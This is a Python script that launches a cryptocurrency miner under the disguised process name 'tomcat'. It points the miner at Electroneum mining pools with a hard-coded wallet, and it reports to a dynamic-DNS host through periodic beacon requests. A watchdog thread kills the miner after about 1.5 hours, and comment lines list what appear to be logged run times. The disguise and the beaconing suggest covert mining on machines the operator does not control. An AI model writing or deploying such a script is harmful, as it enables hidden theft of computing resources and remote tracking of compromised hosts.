import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:03:06.337100
#2018-02-17 16:49:05.194717
#2018-02-17 18:37:04.520190
#2018-02-17 20:25:02.907550
#2018-02-17 22:11:04.278738
#2018-02-17 23:55:03.119637
#2018-02-18 01:44:08.078221
#2018-02-18 03:32:01.714126
#2018-02-18 05:19:05.336751
#2018-02-18 07:11:06.374405
#2018-02-18 08:59:03.960938
#2018-02-18 10:46:03.905153
#2018-02-18 12:33:01.701049
#2018-02-18 14:20:06.885175
#2018-02-18 16:11:01.927680
#2018-02-18 17:59:04.868767
#2018-02-18 19:46:06.420965
#2018-02-18 21:33:05.428450
#2018-02-18 23:22:04.726485
#2018-02-19 01:09:03.544204
#2018-02-19 02:55:05.785145
#2018-02-19 04:42:05.748387
#2018-02-19 06:26:03.897810
#2018-02-19 08:16:02.180286
#2018-02-19 10:05:04.136861
#2018-02-19 11:54:02.155115
#2018-02-19 13:41:01.503857
#2018-02-19 15:28:01.272037
#2018-02-19 17:15:01.490163
#2018-02-19 19:03:07.905961
#2018-02-19 20:49:07.390834
#2018-02-19 22:37:01.800658
#2018-02-20 00:21:04.201183
#2018-02-20 02:09:01.794628
#2018-02-20 03:58:07.338856
#2018-02-20 05:42:07.487408
#2018-02-20 07:28:07.029683
#2018-02-20 09:12:07.771704
#2018-02-20 10:56:07.983265
#2018-02-20 12:45:10.703914
#2018-02-20 14:30:04.545004
#2018-02-20 16:15:05.282390
#2018-02-20 18:02:04.312810
#2018-02-20 19:54:02.089089
#2018-02-20 21:41:05.392832
#2018-02-20 23:22:05.948107
#2018-02-21 01:06:06.880662
#2018-02-21 02:53:01.995006
#2018-02-21 04:42:04.118317
#2018-02-21 06:30:09.076734
#2018-02-21 08:15:07.175009
#2018-02-21 10:01:07.668115
#2018-02-21 11:49:07.345142
#2018-02-21 13:40:01.381940
#2018-02-21 15:25:08.699909
#2018-02-21 17:16:06.199149
#2018-02-21 19:03:06.235332
#2018-02-21 20:51:06.951220
#2018-02-21 22:38:08.476569
#2018-02-22 00:26:06.102169
#2018-02-22 02:13:05.064412
#2018-02-22 03:59:06.266095
#2018-02-22 05:46:02.138221
#2018-02-22 07:31:08.350081
#2018-02-22 09:21:05.816454
#2018-02-22 11:07:08.399440
#2018-02-22 12:53:10.522340
#2018-02-22 14:39:04.848005
#2018-02-22 16:25:07.548258
#2018-02-22 18:11:05.992817
#2018-02-22 20:01:06.013204
#2018-02-22 21:50:09.706092
#2018-02-22 23:36:06.840332
#2018-02-23 01:25:03.885593
#2018-02-23 03:13:03.592768
#2018-02-23 05:00:09.898879
#2018-02-23 06:45:08.201548
#2018-02-23 08:37:01.284734
#2018-02-23 10:52:04.934365
#2018-02-23 12:51:01.642027
#2018-02-23 14:35:06.688898
#2018-02-23 16:23:09.427753
#2018-02-23 18:10:11.252119
#2018-02-23 19:55:04.791442
#2018-02-23 21:38:06.214852
#2018-02-24 00:13:01.926058
#2018-02-24 02:04:02.200608
#2018-02-24 03:54:06.395106
#2018-02-24 05:41:03.200410
#2018-02-24 07:31:06.524566
#2018-02-24 09:18:05.960880
#2018-02-24 11:05:07.496540
#2018-02-24 12:53:03.437804
#2018-02-24 14:41:07.496854
#2018-02-24 16:34:01.556474
#2018-02-24 18:23:05.450179
#2018-02-24 20:09:07.077521
#2018-02-24 21:53:04.766480
#2018-02-25 00:54:04.176174
#2018-02-25 04:40:07.381292
#2018-02-25 08:34:02.045271